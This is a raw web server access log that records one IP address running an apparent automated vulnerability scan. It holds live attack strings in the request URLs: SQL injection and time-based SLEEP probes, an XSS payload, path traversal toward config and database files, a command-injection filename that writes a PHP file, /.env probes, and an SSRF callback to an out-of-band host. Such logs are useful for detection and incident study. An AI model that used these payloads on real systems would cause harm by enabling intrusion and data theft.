/ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:27:09 -0400] "GET /index.php?noAUTO=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15" 154.84.62.234 - - [24/Apr/2025:11:27:40 -0400] "GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:27:41 -0400] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.21" 154.84.62.234 - - [24/Apr/2025:11:28:23 -0400] "POST /admin/pr_monitor/getting_index_data.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 154.84.62.234 - - [24/Apr/2025:11:28:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:28:36 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:28:36 -0400] "GET /?p=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:29:06 -0400] "GET /login.rst HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:29:14 -0400] "GET /login.rst HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.22" 154.84.62.234 - - [24/Apr/2025:11:29:15 -0400] "POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:29:45 -0400] "GET /login.rst HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:29:46 -0400] "POST /graphql HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:29:58 -0400] "GET /login.rst HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:11:30:57 -0400] "GET /file=web_assets/../config.json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0" 154.84.62.234 - - [24/Apr/2025:11:31:14 -0400] "POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:31:37 -0400] "GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(999999999),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:11:31:37 -0400] "GET /cgi-bin/info.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:31:45 -0400] "GET /userLogin.asp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:32:04 -0400] "POST /apriso/portal/kiosk/querylogin.aspx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:32:29 -0400] "GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:32:29 -0400] "POST /process/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:32:34 -0400] "GET /welcome HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.4" 154.84.62.234 - - [24/Apr/2025:11:32:50 -0400] "POST /Admin/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:32:55 -0400] "GET /Admin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:33:33 -0400] "POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:34:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:34:06 -0400] "POST /settings HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:11:34:16 -0400] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/page/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:34:19 -0400] "GET /hAl11e.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:34:22 -0400] "GET /global-protect/portal/images/2w9rfWF9MJTgAZMnXEss7ecZnD5.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:34:26 -0400] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:11:34:28 -0400] "GET /global-protect/portal/images/2w9rfWF9MJTgAZMnXEss7ecZnD5.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:34:55 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:35:05 -0400] "POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:35:10 -0400] "GET /mailinspector/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:35:20 -0400] "GET /javadoc/releases/javadoc/1.0.0//raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:35:27 -0400] "POST /geoserver/wfs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:35:48 -0400] "GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<\"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:35:46 -0400] "POST /include/file.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:11:35:53 -0400] "POST /api/gen/clients/csharp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20" 154.84.62.234 - - [24/Apr/2025:11:36:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:36:28 -0400] "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:37:29 -0400] "GET /api/v1/settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20" 154.84.62.234 - - [24/Apr/2025:11:37:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:37:56 -0400] "GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=https%3A%2F%2fmgrokokbet.id%2Fadmin%2Fmaster%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge=wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.26" 154.84.62.234 - - [24/Apr/2025:11:38:01 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:11:38:02 -0400] "POST /api/pull HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:38:07 -0400] "GET /controlloLogin.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.6.16" 154.84.62.234 - - [24/Apr/2025:11:38:07 -0400] "POST /api/push HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:38:09 -0400] "POST /secserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:11:38:12 -0400] "GET /en-US/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:38:14 -0400] "POST /secserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:11:38:51 -0400] "POST /api/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:11:39:16 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:11:39:28 -0400] "POST /uploadimage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" 154.84.62.234 - - [24/Apr/2025:11:39:41 -0400] "POST /as/wapi/vmp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.44 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:39:47 -0400] "POST /as/wapi/vmp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:11:39:58 -0400] "GET /wp-content/plugins/siteguard/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:41:03 -0400] "GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.d04qr7ij4pq19d75k490d1rgefd5eajzt.oast.online/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:41:07 -0400] "PUT /mdm/checkin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29" 154.84.62.234 - - [24/Apr/2025:11:41:21 -0400] "POST /webtools/control/main/ProgramExport HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:41:22 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /cache/index.tpl.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.65" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /xmlrpc.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /bin/cron.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /phpinfo.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /admin.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /php_info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /xmlrpc.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /php-info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /cpanel.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /admin.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:11:42:34 -0400] "GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:42:40 -0400] "GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.23" 154.84.62.234 - - [24/Apr/2025:11:42:50 -0400] "POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:43:23 -0400] "GET /Login.aspx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:44:34 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:44:40 -0400] "POST /api/v1/chart/data HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" 154.84.62.234 - - [24/Apr/2025:11:45:14 -0400] "POST /client/api?command=samlSso HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:11:45:43 -0400] "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:46:19 -0400] "POST /management/export.php?filename=$(echo+'<\?php+echo+md5(8616);+?>'+>+idemzqxrensv.php)&type=pdf HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:11:46:26 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:46:41 -0400] "GET /api/data HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:46:54 -0400] "GET /WebInterface/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:46:57 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:11:47:05 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:11:47:08 -0400] "POST /openam/json/realms/root/authenticate HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0" 154.84.62.234 - - [24/Apr/2025:11:47:13 -0400] "GET /?es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:47:38 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:47:56 -0400] "GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:11:48:18 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:11:48:39 -0400] "POST /Startup/Register HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:48:42 -0400] "POST /Token HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:49:02 -0400] "POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" 154.84.62.234 - - [24/Apr/2025:11:49:05 -0400] "POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:49:16 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:49:51 -0400] "GET /login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:49:51 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:11:50:03 -0400] "GET /?p=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:50:28 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:50:43 -0400] "POST /business-directory/?dosrch=1&q&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1] HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:51:01 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:51:04 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:51:47 -0400] "GET /solr/admin/info/properties:/admin/info/key HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79" 154.84.62.234 - - [24/Apr/2025:11:51:52 -0400] "GET /default.aspx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:52:06 -0400] "POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:52:10 -0400] "GET /common/xdumo.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - 